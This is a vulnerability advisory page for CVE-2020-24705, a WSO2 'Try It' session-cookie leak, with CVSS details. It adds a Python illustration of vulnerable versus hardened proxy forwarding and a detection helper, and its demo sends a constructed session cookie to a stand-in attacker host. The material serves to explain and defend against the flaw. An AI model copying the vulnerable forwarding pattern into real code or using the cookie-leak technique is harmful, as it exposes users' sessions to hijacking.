Session Hijacking Vulnerability in WSO2 API Manager and Identity Server
CVE-2020-24705

8.8 HIGH

Key Information:

Vendor:
WSO2
CVE Published:
27 August 2020

What is CVE-2020-24705?

A security issue has been identified in several WSO2 products that allows an attacker to hijack a legitimate user's session. If a legitimate user submits a specially crafted 'Try It' request, the user's Carbon Management Console session cookie may inadvertently be sent along with that request to a server controlled by the attacker. This vulnerability primarily affects WSO2 API Manager (up to version 3.1.0), WSO2 API Manager Analytics (up to version 2.5.0), and various versions of WSO2 Identity Server and IoT Server. Users are advised to review the vendor's security advisories and apply the available patches.
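The defect class described above, as an added illustration that is not WSO2's code: a 'Try It' proxy that copies the browser's headers (console session cookie included) onto an outbound request to a caller-supplied URL, beside a hardened version that only forwards to an allowlisted HTTPS host and strips the console cookie before forwarding. The allowlist, cookie name and URLs are constructed for the example.

```python
from urllib.parse import urlsplit

# Backend hosts the 'Try It' proxy may forward to (constructed for this example).
ALLOWED_TARGET_HOSTS = {"api.example.internal"}
# Placeholder name for the management-console session cookie (assumption).
SESSION_COOKIE_NAME = "JSESSIONID"


def vulnerable_forward(target_url: str, browser_headers: dict) -> dict:
    """Vulnerable pattern: forwards every browser header, including the console
    session cookie, to whatever URL the request named. If an attacker gets a
    user to submit a request naming the attacker's server, the cookie leaks."""
    return {"url": target_url, "headers": dict(browser_headers)}


def hardened_forward(target_url: str, browser_headers: dict) -> dict:
    """Hardened pattern: the target must be an allowlisted HTTPS host, and the
    console cookie is never forwarded, because the backend never needs it."""
    parts = urlsplit(target_url)
    # urlsplit().hostname ignores any userinfo ("allowed-host@attacker"), so the
    # check is made against the host that would actually be contacted.
    if parts.scheme != "https" or parts.hostname not in ALLOWED_TARGET_HOSTS:
        raise ValueError(f"refusing to forward to untrusted target {parts.hostname!r}")
    headers = {k: v for k, v in browser_headers.items() if k.lower() != "cookie"}
    return {"url": target_url, "headers": headers}


def session_cookie_leaked(outbound: dict) -> bool:
    """Detection helper: does an outbound request carry the console session
    cookie to a host outside the allowlist?"""
    host = urlsplit(outbound["url"]).hostname
    cookie = next((v for k, v in outbound["headers"].items() if k.lower() == "cookie"), "")
    return host not in ALLOWED_TARGET_HOSTS and SESSION_COOKIE_NAME + "=" in cookie


if __name__ == "__main__":
    # Constructed browser headers: a console session plus an ordinary Accept header.
    hdrs = {"Cookie": "JSESSIONID=constructed-session-id", "Accept": "application/json"}
    print(session_cookie_leaked(vulnerable_forward("https://attacker.example/collect", hdrs)))
    print(hardened_forward("https://api.example.internal/pets", hdrs))
```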

CVSS V3.1

Score: 8.8
Severity: HIGH
Confidentiality: High
Integrity: High
Availability: High
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Unchanged

Timeline

  • Vulnerability published: 27 August 2020